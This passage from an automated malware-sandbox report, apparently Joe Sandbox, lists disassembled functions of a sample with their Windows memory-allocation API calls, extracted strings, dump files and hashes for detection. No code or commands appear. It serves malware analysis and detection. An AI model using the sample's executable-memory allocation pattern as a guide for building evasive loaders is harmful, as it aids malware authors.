                    • Opcode ID: 9d30e288a2bef91a97465712db77debd21a9ee98f14e1bb36b4f8901b46d0eba
                    • Instruction ID: e0d7831a08093cb0501d9c017c7da0e53b530130ed4527cd63bf3d9e12fea5cc
                    • Opcode Fuzzy Hash: 9d30e288a2bef91a97465712db77debd21a9ee98f14e1bb36b4f8901b46d0eba
                    • Instruction Fuzzy Hash: 3F91ABB05183418BD725CF18C890B6BBBF1FF82354F149A2DF9A69B291D374D906CB92
                    Function 003D0F04 Relevance: 11.3, APIs: 4, Strings: 2, Instructions: 802nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003D28F6
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003D294F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: EXEC$Y]KB
                    • API String ID: 292159236-105863924
                    • Opcode ID: e2afc85f620da47da50744ab62e302b2ed2d2512b450606bc0565a79c6269584
                    • Instruction ID: 89e74d8cc54d01796f1b9580617f2361b5aa9340b47f026751142dad0668e4d7
                    • Opcode Fuzzy Hash: e2afc85f620da47da50744ab62e302b2ed2d2512b450606bc0565a79c6269584
                    • Instruction Fuzzy Hash: 9652BB71104B418BD336CF29D4947A3BBE2BF66314F188A5ED4EB8BB92D774A409CB50
                    Function 003CA880 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 153nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CAB42
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003CAB97
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: IXta$JaLc$`w$~w
                    • API String ID: 292159236-2358998091
                    • Opcode ID: 80815b79dba12e5bb4a5472071d169460dac78fffe25a7ef6a9dce99589bbf83
                    • Instruction ID: 1efc46cedf4c2e2197f0f9d973630bba38652a33978e199a5a6cbee7fbc29584
                    • Opcode Fuzzy Hash: 80815b79dba12e5bb4a5472071d169460dac78fffe25a7ef6a9dce99589bbf83
                    • Instruction Fuzzy Hash: DC611CB0219385AFD364CF18D884B6BBBF5FB81748F50991CF5A58B2A1D7B4C805CB82
                    Function 003E1950 Relevance: 9.4, APIs: 6, Instructions: 396nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00100000,00003000,00000004), ref: 003E19A0
                    • NtAllocateVirtualMemory.NTDLL(000000FF,0000BA00,00000000,?,00003000,00000040), ref: 003E1AA0
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000010,00008000), ref: 003E1AFC
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00010000,00008000), ref: 003E1B46
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000004), ref: 003E1B6C
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003E1E54
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 00f269e3f8b60e05468b6b961dd3ebefb3d7af972c1a380bd9451fe8d220ec87
                    • Instruction ID: a7230f21e489508be45de2ecd13c318665e68b262fe5cc491e6edf2ae74bb0eb
                    • Opcode Fuzzy Hash: 00f269e3f8b60e05468b6b961dd3ebefb3d7af972c1a380bd9451fe8d220ec87
                    • Instruction Fuzzy Hash: F3D19B716083959FC715CF29C890B2BBBE5ABC9314F148B2CF9A58B3D1D7B19904CB92
                    Function 003B1700 Relevance: 9.3, Strings: 7, Instructions: 578COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: .$.$0$[$false$null$true
                    • API String ID: 0-2094208800
                    • Opcode ID: 5c06d27b1e8507ce7f1153f6f473524ac05afc95337bb5cc4c83269efb6345dd
                    • Instruction ID: 23952251dd1dc694b310c59839dc174d3ab776ee77b7f7f0e5a9dead9095bc36
                    • Opcode Fuzzy Hash: 5c06d27b1e8507ce7f1153f6f473524ac05afc95337bb5cc4c83269efb6345dd
                    • Instruction Fuzzy Hash: FC023EB0A003098BD7125F25DC597A7BBE8BF4034CF59453CEA858B792EB75D904CB52
                    Function 003C960A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: amjh
                    • API String ID: 0-1051360590
                    • Opcode ID: 27d25c7b719540e188db9ce4d67cbdc45de735fe7123f24b23862d0deb24faf4
                    • Instruction ID: b3cee0bc67c0a2bf2106a24de5dc6fe54bdb4484daebbcf0ff63cee0d8a58d01
                    • Opcode Fuzzy Hash: 27d25c7b719540e188db9ce4d67cbdc45de735fe7123f24b23862d0deb24faf4
                    • Instruction Fuzzy Hash: A0E19A711093908FD725CF18C890BAFB7E5FB88714F058A2DE9A99B390CB759905CB92
                    Function 003E6400 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 319nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003E64A8
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 003E6506
                    • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 003E65CB
                    • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 003E6628
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: R-,T
                    • API String ID: 292159236-635581381
                    • Opcode ID: 762e8fb2db551a3e3ca92e456da6f6b4fe6b1652bc4165d665497c7fd388b71d
                    • Instruction ID: aee717329074c0ed20d05424315c915eb771c88fd1ff5b198f6673b4709b75f4
                    • Opcode Fuzzy Hash: 762e8fb2db551a3e3ca92e456da6f6b4fe6b1652bc4165d665497c7fd388b71d
                    • Instruction Fuzzy Hash: 19B1AD752083518FC311CF19C881B2AF7E6EF98354F158A2CE9A48B3E0D7B1E905CB92
                    Function 003D6D8E Relevance: 9.0, Strings: 7, Instructions: 244COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$C$E$G$L$Z$w
                    • API String ID: 0-3096178343
                    • Opcode ID: c18176de97d8f5dd1db6028488d32b23572d519a5b2e7193f1f56188cae4e67f
                    • Instruction ID: 200dd44afba70b0182b513b2334dfd9fdc47bee4f955c342e2f68a1f253cb0bb
                    • Opcode Fuzzy Hash: c18176de97d8f5dd1db6028488d32b23572d519a5b2e7193f1f56188cae4e67f
                    • Instruction Fuzzy Hash: C9A1C87660D3808FD726CB28D89579EBBD2ABD5320F198B2DD4E98B3C1D7799804C742
                    Function 003E1220 Relevance: 6.2, APIs: 4, Instructions: 187nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E12C9
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E1319
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E13DD
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 003E1427
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 91ef93e091c6d00b3f520d1130408dfba1f25c388a9bb2f24553014bbb578c7c
                    • Instruction ID: 5d0198bf0bcc696d36d2268551796a1450b49f4ceaf774a004e7f2f3d8473883
                    • Opcode Fuzzy Hash: 91ef93e091c6d00b3f520d1130408dfba1f25c388a9bb2f24553014bbb578c7c
                    • Instruction Fuzzy Hash: 895199712093509FD311CF19C844B2BBBE9EB88718F158A2DF5A89B3D0D7B5D909CB92
                    Function 003C4810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 003C484D
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 003C487E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID: qrs
                    • API String ID: 237503144-2859022563
                    • Opcode ID: 8b37c0d5ed698508180a2d10c34aacc77ff099a054981229bec46c9de33405a8
                    • Instruction ID: d704d7639a7d21bd30cbc1cc63f690b56a0c81503aa39733fa53049cfe2de3b8
                    • Opcode Fuzzy Hash: 8b37c0d5ed698508180a2d10c34aacc77ff099a054981229bec46c9de33405a8
                    • Instruction Fuzzy Hash: 0351AE702183919FD331DF14C8A1FABB7F8EF86714F404A1CE9999B691DB709904CB92
                    Function 003CA762 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CA926
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003CA97C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: 45
                    • API String ID: 292159236-2889884971
                    • Opcode ID: feaa2ad1c0059413b5ecf929cab71a45fcb3ab82854b68cf33d986fa5e7202ec
                    • Instruction ID: 61022a13fa84d5ff2f17bea262b43cc42b8337235dea1310abc1094d63d053f5
                    • Opcode Fuzzy Hash: feaa2ad1c0059413b5ecf929cab71a45fcb3ab82854b68cf33d986fa5e7202ec
                    • Instruction Fuzzy Hash: E4510EB11183859FE325CF14C885B5BBBE9BB85308F508A1DF5A58B290C7B59809CF93
                    Function 003E5AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E5B5F
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003E5BB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: $
                    • API String ID: 292159236-3993045852
                    • Opcode ID: 290787a57efc804fe31ee17e57a1c1ae3ee3c03ccf2fabe77eb9f3eab183d9e2
                    • Instruction ID: cb677a83e3188d14c1a9ac63c875421afe8c8118c033aed7dfb72bce92f947d8
                    • Opcode Fuzzy Hash: 290787a57efc804fe31ee17e57a1c1ae3ee3c03ccf2fabe77eb9f3eab183d9e2
                    • Instruction Fuzzy Hash: 99318F71208311AFE311CF59CC81B5BBBE9EB84754F114A18F9A49B3E0C7F1A945CB92
                    Function 003C2277 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C2460
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C24AA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: E~a
                    • API String ID: 292159236-3518370834
                    • Opcode ID: 0d1ac0a871109582ef05d23d7485ed2751c1f20ad6c156da55a55dc2da763866
                    • Instruction ID: 4dc646056a73be1bea374cceafbf8b7f5d5ee9b416797f7034e4289a1bc6e59b
                    • Opcode Fuzzy Hash: 0d1ac0a871109582ef05d23d7485ed2751c1f20ad6c156da55a55dc2da763866
                    • Instruction Fuzzy Hash: 9D311875200B008FD725CF25C881B67B7F9FB48304F148A1DE6A68BBA0C7B5A905CB90
                    Function 003CC765 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73nativememoryCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CC80C
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CC85F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: &>$>
                    • API String ID: 292159236-3126926185
                    • Opcode ID: b974a199b532b52b23c270d2a14fdc6b5fab61ae0c7430c223e2c276a362917e
                    • Instruction ID: 5703e1f5175063a179e0309c35c6861cce239e2421520693a96a9de0088ae44f
                    • Opcode Fuzzy Hash: b974a199b532b52b23c270d2a14fdc6b5fab61ae0c7430c223e2c276a362917e
                    • Instruction Fuzzy Hash: 14214A75211B449FE725CF28C845BA7B3E8FB46304F444A1DE6FA8B690DBB46844CB92
                    Function 003C2F77 Relevance: 3.4, APIs: 2, Instructions: 404COMMON
                    Download Yara Rule
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 003C3242
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 003C328F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID:
                    • API String ID: 237503144-0
                    • Opcode ID: 695543a33c1f41ff7e0dfaa91900f6a0b9b9b47ccb2387f6d3155b9aa20933ab
                    • Instruction ID: fb93abc901fe6b904c669e4d959cbbbc504b9ed98257d5b0f7cd0c3b0cb1f0b3
                    • Opcode Fuzzy Hash: 695543a33c1f41ff7e0dfaa91900f6a0b9b9b47ccb2387f6d3155b9aa20933ab
                    • Instruction Fuzzy Hash: DFD16975600B008FD72ACF24C891BA7B7E1EF49304F148A5DD4AACB7A2DB35E945CB90
                    Function 003B51F0 Relevance: 3.3, Strings: 2, Instructions: 830COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0$8
                    • API String ID: 0-46163386
                    • Opcode ID: b35d5e2c12c17be76bf0d6ed3307e9a94d3e2fdfbe54504ad461c87e46dade17
                    • Instruction ID: e83225a0b422904a429c602cb91ffbfadb408add2370b531812f85f7892e5aa6
                    • Opcode Fuzzy Hash: b35d5e2c12c17be76bf0d6ed3307e9a94d3e2fdfbe54504ad461c87e46dade17
                    • Instruction Fuzzy Hash: 2C7267756087409FD725CF18C840B9ABBE2BFC8358F08892DFA898B791D775D944CB92
                    Function 003C9C41 Relevance: 3.2, APIs: 2, Instructions: 218nativememoryCOMMON
                    Download Yara Rule
                    APIs
